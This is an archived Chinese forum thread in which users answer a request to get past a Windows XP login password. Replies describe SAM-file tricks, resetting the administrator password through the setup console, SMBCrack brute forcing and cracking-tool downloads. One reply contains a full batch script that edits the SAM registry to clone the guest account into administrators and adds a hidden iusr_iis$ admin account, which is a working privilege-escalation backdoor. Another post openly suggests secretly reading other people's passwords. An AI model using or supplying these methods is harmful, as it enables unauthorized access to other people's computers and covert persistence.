标题: 如何破解密码 [打印本页]

---

作者: xjmxjm1234     时间: 2006-5-23 22:00    标题: 如何破解密码

我一个朋友 xp 的开机密码忘了,如何编写批命令来逐个猜测密码,直到破解.

---

作者: Michael     时间: 2006-5-23 22:03
这个用批处理完成不太可能。

---

作者: weilong888     时间: 2006-5-23 22:06
不要这么烦的，到DOS下，把SAM文件删掉，就没有原用户设定的信息了，不用密码就可以进入了。

---

作者: JonePeng     时间: 2006-5-23 23:53

Quote:

Originally posted by weilong888 at 2006-5-23 22:06: 不要这么烦的，到DOS下，把SAM文件删掉，就没有原用户设定的信息了，不用密码就可以进入了。

这是对付Win2000的老方法，在XP下已经不管用了。
在纯DOS下把 \Windows\repair 目录下的 SAM. 覆盖 \Windows\system32\config 下的同名文件就可以清除密码了。

---

作者: electronixtar     时间: 2006-5-24 09:43
都不管用了

直接用安装盘启动安装界面时按Shift+F10，打开一个命令行窗口，用net user administrator 123 修改密码为123

看我的帖子：
http://www.cn-dos.net/forum/viewthread.php?tid=20561&fpage=1

---

作者: xjmxjm1234     时间: 2006-5-24 19:42
谢了,我明天去告诉他,我想他一定会高兴的

---

作者: Jneny     时间: 2006-5-24 20:05
天外有天，精彩

---

作者: 3742668     时间: 2006-5-24 23:22
另外有个传说就是用SHIFT+F10打开CMD后运行SET不加参数可以看到密码。不过没有忘记过密码，所以也没有验证过，你让你朋友试试看看传说是不是真的。

---

作者: willsort     时间: 2006-5-24 23:30

─────────────────　版务记录　─────────────────
执行：Will Sort
操作：移动主题：自《DOS批處理 & 腳本技術（批處理室）》
说明：依照主题内容分类，更适合于发表在此版区
提示：原版区转向链接三日后将删除
─────────────────　版务记录　─────────────────

---

作者: jun19841     时间: 2006-5-25 01:50
运行 输入SET   这个传说好象是假的，，，，，，    ````

---

作者: jun19841     时间: 2006-5-25 01:52
是真的！！！！

---

作者: xiongwei2624     时间: 2006-6-30 15:12
都有道理！

---

作者: electronixtar     时间: 2006-6-30 16:09
如果机器联网了可以试试SMBCrack，嘿嘿，速度飞快！

---

作者: 327933380     时间: 2006-7-7 12:37

Quote:

Originally posted by Jonsgen at 2006-5-24 20:05: 天外有天，精彩

:o精彩
精彩
:o

---

作者: phoenixcw     时间: 2006-7-18 17:19
win  erd2003

---

作者: oookillooo     时间: 2007-2-5 00:28    标题: 经验

你们说的有问题，在xp中用删除sam会让主机无法登陆。在98中还可以。me 2000 nt 没用过，但xp中就不行,sam文件坏了，会让系统陷入死循环。
用msdos中的密码破解工具可以，是exe文件的,也不大很方便。
我的家http://www.oookillooo.ys168.com/
很问题我全力帮忙。帮忙顶一下。
谢谢。

---

作者: gne3     时间: 2007-2-25 02:58
我是不会，但是可以在Winxp，放电好像可以

---

作者: Kinglion     时间: 2007-2-25 09:50

Quote:

Originally posted by weilong888 at 2006-5-23 22:06: 不要这么烦的，到DOS下，把SAM文件删掉，就没有原用户设定的信息了，不用密码就可以进入了。

此方法对 Windows 2000有效，对XP、2003系统就无效了。

---

作者: Kinglion     时间: 2007-2-25 09:55    标题: 登录此网站下载破解软件吧。

http://www.password-changer.com/download.htm

---

作者: 雨露     时间: 2007-2-25 10:14
这个主题在相关杂志上和网络上已流行很多版本了，有的说行，有的说不行，看得人一头雾水，不知所措，很有实践一下的必要！
记得今年第4期的电爱杂志上有专门介绍！现在是人云亦言的多，大多数人都没有在自己电脑上将所有的系统和可能的环境试过，或者自己的电脑情况也有特殊性存在。

[ Last edited by 雨露 on 2007-2-24 at 09:24 PM ]

---

作者: Kinglion     时间: 2007-2-25 17:31
下载 深山红叶 系统维护光盘V25版，光盘启动系统菜单上有选项可恢复密码。

---

作者: youkkk     时间: 2007-2-27 09:05
ghost 提升权限..   在论坛里面找到的.

@echo guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem 本guest.bat自动克隆guest为administrators组。
@rem 如果存在username表示在终端登陆的环境运行bat.需要手工输入pid值。
@rem 最好先手工修改密码。执行本程序两次。哈哈。 主要是没有掩饰。regedit比较费时间。
@set zpath=%path%
@set zcd=%cd%
@set path=%path%;%windir%;%windir%\system32

:start
@net user guest |find /i "*Domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@if NOT "%USERNAME%"=="" echo username=[%username%],term_login mode. input PID. &&goto Term

:start1
@pulist.exe |findstr.exe /i "WINLOGON.exe" >a
@setx.exe a -f a -a 0,1 >b
@FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (b) do @set zpid=%%i
@goto AUTO

:Term
@if "%1"=="" goto USAGE
@if NOT "%2"=="" net user guest %2
@if NOT "%2"=="" net user |find /i "tsinternetuser" >nul &&net user tsinternetuser %2
@set zpid=%1


:AUTO
@echo Make admg.reg admt.reg admiis.reg
@psu.exe -p "%windir%\regedit.exe -e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -e name.$$$ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names" -i %zpid% >nul
@echo Windows Registry Editor Version 5.00 >admg.reg
@echo Windows Registry Editor Version 5.00 >admt.reg
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]>>admg.reg
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003e8]>>admt.reg
@type admin.reg >a &echo "Unicode -->>> ansi . find.exe use it ansi." &if exist b del b
@echo "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx.exe a -f a -a 4,0 |find "," >>b
@setx.exe a -f a -a 5,0 |find "," >>b
@setx.exe a -f a -a 6,0 |find "," >>b
@type b >>admg.reg
@type b >>admt.reg

:IIS
@set zda=no
@echo iusr_iis exec
@type name.$$$ >name.reg
@copy name.reg name.txt >nul
@FOR /L %%i IN (5,3,30) DO @(setx.exe a -f name.reg -a %%i,0 |find /i "IUSR_IIS$" &&set zda=%%i)
@if "%zda%" =="no" goto PSU
@rep.exe "IUSR_IIS$" name.txt /R /I >nul
@rep.exe "Editor" name.txt /R /I >nul
@find.exe /v /n "" name.txt >n1
@findstr /I "%zda%" n1 >name.iis
@setx a -f name.iis -a 0,1 -d () >zdc
@del n1
@del name.iis
@del name.$$$
@del name.txt
@del a
@del b

@For /F "tokens=1,2* delims= " %%i in (zdc) do @(echo %%i>zdd)
@For /F "tokens=1,2* delims= " %%i in (zdd) do @(set zdd=%%i)
@copy admg.reg admiis.reg >nul
@echo rep.exe "1f5" "%zdd%" admiis.reg /I
@rep.exe "1f5" "%zdd%" admiis.reg /I
@del zdc
@del zdd

:PSU
@attrib -s -r admg.bak >nul
@attrib -s -r admt.bak >nul
@copy admg.bak admg.reg >nul
@copy admt.bak admt.reg >nul
@psu.exe -p "%windir%\regedit.exe -s admg.reg" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -s admt.reg" -i %zpid% >nul

@if NOT "%zda%"=="no" psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid% >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:yes >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:no >nul

@copy admg.reg admg.bak >nul
@copy admt.reg admt.bak >nul
@attrib admg.bak +r +s >nul
@attrib admt.bak +r +s >nul

@net user guest /active:yes >nul
@net user guest /active:no >nul
@net user |find /I "tsinternetuser" || goto NEXT
@net user tsinternetuser /active:yes >nul
@net user tsinternetuser /active:no >nul
@if exist admin.reg del admin.reg /f >nul
@if exist admg.reg del admg.reg /f >nul
@if exist admt.reg del admt.reg /f >nul
:Next
@goto end


:DOMAIN
@rem add user iusr_iis$
@if "%2"=="" echo "not input guest of password" &&goto END
@net user |find /i "iusr_iis" >nul ||net user iusr_iis$ %2 /add
@net localgroup administrators |find /i "iusr_iis$" >nul ||net localgroup administrators iusr_iis$ /add
@goto END

:USAGE
@pulist.exe |findstr.exe /i "WINLOGON explorer"
@echo " system.bat zpid <password> "
@echo " Need cur winlogon PID ,Term_mode，Must this Term_login_winlogon_pid. "
@goto end1

:END
@echo ________ALL User IN administrators :
@net localgroup administrators
:END1
@echo psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=

---

作者: Kinglion     时间: 2007-2-28 00:15
如果禁用了GUEST用户怎么办呢？

所以还是用专用恢复光盘来实现吧。

---

作者: 6622186     时间: 2007-4-24 11:57
输入 set 就显示密码, 实在是愚不可及.

set 的作用是显示和设置环境变量. 说能显示密码实在是.....

---

作者: 6622186     时间: 2007-4-24 12:04
16 楼说的对. 不要再发"删除sam文件就可以登录"这样的帖子, 以免误导.

---

作者: leizhongniao     时间: 2007-6-27 17:00
记下了，以后密码忘了就有得救了

---

作者: minchengan     时间: 2007-6-29 20:36    标题: 给大家一个最好的答案

你可以下载我的U盘系统(在多媒体版块)，里面有一个WINXPE，启动后，里面有一个直接查看硬盘上XP系统密码的程序，比破解密码要更高一筹吧，因为两个原因：第一，你想知道的是别人机器上的密码又不想让别人知道你动过别人机器；第二，NTFS有加密功能，如果直接清除密码，比如DOS下的PASSWD，可能会让加密的文件打不开(没试过，猜的)。所以用我的系统，是中文版(需在OPTION里改一下语言即可)。大家用着试试，我以前很喜欢网络安全，03年拿过网络安全工程师证，只是一直没从事这方面的工作。让大家见笑了。

---

作者: jiugui911     时间: 2007-7-3 04:22
管他是真的假的试试去

---

作者: dainiqufacai     时间: 2008-8-4 10:44
输入SET能看到密码？？？我怎么看不到啊？？